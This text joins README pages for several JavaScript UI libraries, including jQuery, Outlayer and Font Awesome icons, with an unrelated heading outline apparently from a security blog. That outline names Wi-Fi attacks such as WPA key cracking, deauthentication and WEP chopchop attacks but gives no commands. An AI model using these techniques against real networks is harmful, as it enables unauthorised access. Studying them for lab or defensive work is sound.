# Fizzy UI utils UI utility & helper functions Used in [Flickity](http://flickity.metafizzy.co), [Isotope](http://isotope.metafizzy.co), [Masonry](http://masonry.desandro.com), [Draggabilly](http://draggabilly.desandro.com) ## Install Bower: `bower install fizzy-ui-utils --save` npm: `npm install fizzy-ui-utils --save` ## API ``` js // fizzyUIUtils is the browser global var utils = fizzyUIUtils; // ---- ---- // utils.extend( a, b ) // extend object utils.modulo( num, div ) // num [modulo] div utils.makeArray( obj ) // make array from object utils.removeFrom( ary, obj ) // remove object from array utils.getParent( elem, selector ) // get parent element of an element, given a selector string utils.getQueryElement( elem ) // if elem is a string, use it as a selector and return element Class.prototype.handleEvent = utils.handleEvent; // enable Class.onclick when element.addEventListener( 'click', this, false ) utils.filterFindElements( elems, selector ) // iterate through elems, filter and find all elements that match selector utils.debounceMethod( Class, methodName, threhold ) // debounce a class method utils.docReady( callback ) // trigger callback on document ready utils.toDashed( str ) // 'camelCaseString' -> 'camel-case-string' utils.htmlInit( Class, namespace ) // on document ready, initialize Class on every element // that matches js-namespace // pass in JSON options from element's data-options-namespace attribute ``` --- [MIT license](http://desandro.mit-license.org/). Have at it. By [Metafizzy](http://metafizzy.co)

@fortawesome/free-regular-svg-icons - SVG with JavaScript version
# @fortawesome/free-regular-svg-icons - SVG with JavaScript version > "I came here to chew bubblegum and install Font Awesome 5 - and I'm all out of bubblegum" [![npm](https://img.shields.io/npm/v/@fortawesome/free-regular-svg-icons.svg?style=flat-square)](https://www.npmjs.com/package/@fortawesome/free-regular-svg-icons) ## Installation ``` $ npm i --save @fortawesome/free-regular-svg-icons ``` Or ``` $ yarn add @fortawesome/free-regular-svg-icons ``` ## Documentation Get started [here](https://fontawesome.com/get-started/svg-with-js). Continue your journey [here](https://fontawesome.com/how-to-use/svg-with-js). Or go straight to the [API documentation](https://fontawesome.com/how-to-use/font-awesome-api). ## Issues and support Start with [GitHub issues](https://github.com/FortAwesome/Font-Awesome/issues) and ping us on [Twitter](https://twitter.com/fontawesome) if you need to.

jQuery Easing Plugin
# jQuery Easing Plugin What is it? A jQuery plugin from GSGD to give advanced easing options. More info [here](http://gsgd.co.uk/sandbox/jquery/easing) For CDN please use CloudFlare [`https://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.4.1/jquery.easing.min.js`](https://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.4.1/jquery.easing.min.js) to help my host. Thank you. # AMD or CommonJS usage ```js // CommonJS var jQuery = require('jquery'); require('jquery.easing')(jQuery); // AMD define(['jquery', 'jquery.easing'], function (jQuery, easing) { easing(jQuery) }) ``` # Building and testing * Clone the repo * `npm install` * Make changes * Test against files in `/examples` * Build minified version with `npm run build`

jQuery
# jQuery > jQuery is a fast, small, and feature-rich JavaScript library. For information on how to get started and how to use jQuery, please see [jQuery's documentation](http://api.jquery.com/). For source files and issues, please visit the [jQuery repo](https://github.com/jquery/jquery). If upgrading, please see the [blog post for 3.3.1](https://blog.jquery.com/2017/03/20/jquery-3.3.1-now-available/). This includes notable differences from the previous version and a more readable changelog. ## Including jQuery Below are some of the most common ways to include jQuery. ### Browser #### Script tag ```html ``` #### Babel [Babel](http://babeljs.io/) is a next generation JavaScript compiler. One of the features is the ability to use ES6/ES2015 modules now, even though browsers do not yet support this feature natively. ```js import $ from "jquery"; ``` #### Browserify/Webpack There are several ways to use [Browserify](http://browserify.org/) and [Webpack](https://webpack.github.io/). For more information on using these tools, please refer to the corresponding project's documention. In the script, including jQuery will usually look like this... ```js var $ = require("jquery"); ``` #### AMD (Asynchronous Module Definition) AMD is a module format built for the browser. For more information, we recommend [require.js' documentation](http://requirejs.org/docs/whyamd.html). ```js define(["jquery"], function($) { }); ``` ### Node To include jQuery in [Node](nodejs.org), first install with npm. ```sh npm install jquery ``` For jQuery to work in Node, a window with a document is required. Since no such window exists natively in Node, one can be mocked by tools such as [jsdom](https://github.com/tmpvar/jsdom). This can be useful for testing purposes. ```js require("jsdom").env("", function(err, window) { if (err) { console.error(err); return; } var $ = require("jquery")(window); }); ```

Outlayer
# Outlayer _Brains and guts of a layout library_ Outlayer is a base layout class for layout libraries like [Isotope](http://isotope.metafizzy.co), [Packery](http://packery.metafizzy.co), and [Masonry](http://masonry.desandro.com) Outlayer layouts work with a container element and children item elements. ``` html

...
``` ## Install Install with [Bower](http://bower.io): `bower install outlayer` [Install with npm](http://npmjs.org/package/outlayer): `npm install outlayer` ## Outlayer.create() Create a layout class with `Outlayer.create()` ``` js var Layout = Outlayer.create( namespace ); // for example var Masonry = Outlayer.create('masonry'); ``` + `namespace` _{String}_ should be camelCased + returns `LayoutClass` _{Function}_ Create a new layout class. `namespace` is used for jQuery plugin, and for declarative initialization. The `Layout` inherits from [`Outlayer.prototype`](docs/outlayer.md). ``` var elem = document.querySelector('.selector'); var msnry = new Masonry( elem, { // set options... columnWidth: 200 }); ``` ## Item Layouts work with Items, accessible as `Layout.Item`. See [Item API](docs/item.md). ## Declarative An Outlayer layout class can be initialized via HTML, by setting an attribute of `data-namespace` on the element. Options are set in JSON. For example: ``` html
...
``` The declarative attributes and class will be dashed. i.e. `Outlayer.create('myNiceLayout')` will use `data-my-nice-layout` as the attribute. ## .data() Get a layout instance from an element. ``` var myMasonry = Masonry.data( document.querySelector('.grid') ); ``` ## jQuery plugin The layout class also works as jQuery plugin. ``` js // create Masonry layout class, namespace will be the jQuery method var Masonry = Outlayer.create('masonry'); // rock some jQuery $( function() { // .masonry() to initialize var $grid = $('.grid').masonry({ // options... }); // methods are available by passing a string as first parameter $grid.masonry( 'reveal', elems ); }); ``` ## RequireJS To use Outlayer with [RequireJS](http://requirejs.org/), you'll need to set some config. Set [baseUrl](http://requirejs.org/docs/api.html#config-baseUrl) to bower_components and set a [path config](http://requirejs.org/docs/api.html#config-paths) for all your application code. ``` js requirejs.config({ baseUrl: 'bower_components', paths: { app: '../' } }); requirejs( [ 'outlayer/outlayer', 'app/my-component.js' ], function( Outlayer, myComp ) { new Outlayer( /*...*/ ) }); ``` Or set a path config for all Outlayer dependencies. ``` js requirejs.config({ paths: { 'ev-emitter': 'bower_components/ev-emitter', 'get-size': 'bower_components/get-size', 'matches-selector': 'bower_components/matches-selector' } }); ``` ## MIT license Outlayer is released under the [MIT license](http://desandro.mit-license.org).

Jesse P Lesperance

Dangers of using Open and Public Wifi Hotspots

Man-in-the-middle (MITM) attacks

How to mitigate the risks:

Malware

How to mitigate the risks:

Phishing

How to mitigate the risks:

Conclusion

Hacking WPA/WPA2 PSK

Overview

Initial Attack Setup

Recon

De-authentication Attack

Preperation

Create Airolib Database (Optional)

Prepare John the Ripper

coWPAtty Rainbow Tables

Crack the WPA Key

Wordlist-based Crack

Airolib Database-based Crack

Aircrack-ng with JTR

coWPAtty Dictionary Mode

coWPAtty Rainbow Tables Mode

Setting up a Rasberry Pi as a Wireless AP

Table of Contents

Overview

Requirements

Instructions

Update Raspbian

Install hostapd and dnsmasq

Configure a static IP

Configure the DHCP server(dnsmasq)

Configure the access point host software

Setting up traffic forwarding

Add iptables rule

hostapd sample configurations

WEP Open Authentication

WEP Pre-Shared Key Authentication

WPA-PSK

WPA2-PSK

WPA2 Enterprise

Bypassing WEP Shared Key Authentication

Overview

Initial Attack Setup

Recon

Authenticate

Deauthentication Attack

Shared Key Fake Authentication Attack

ARP Request Replay Attack

Deauthentication Attack

Crack the WEP Key

Hacking Clientess WEP Networks

Overview

Initial Attack Setup

Recon

Authenticate

Fragmentation Attack

Crafting a Packet with the PRGA

KoreK ChopChop Attack

Interactive Packet Replay

Crack the WEP Key

Hacking WEP via a Client

Overview

Initial Attack Setup

Recon

Authenticate

Generating Weak IVs

Cracking the WEP Key

Hacking WEP With Connected Clients

Overview

Initial Attack Setup

Recon

Authenticate

Generating Weak IVs

Cracking the WEP Key

Overview & Commands

Table of Contents

Posts in this Series

General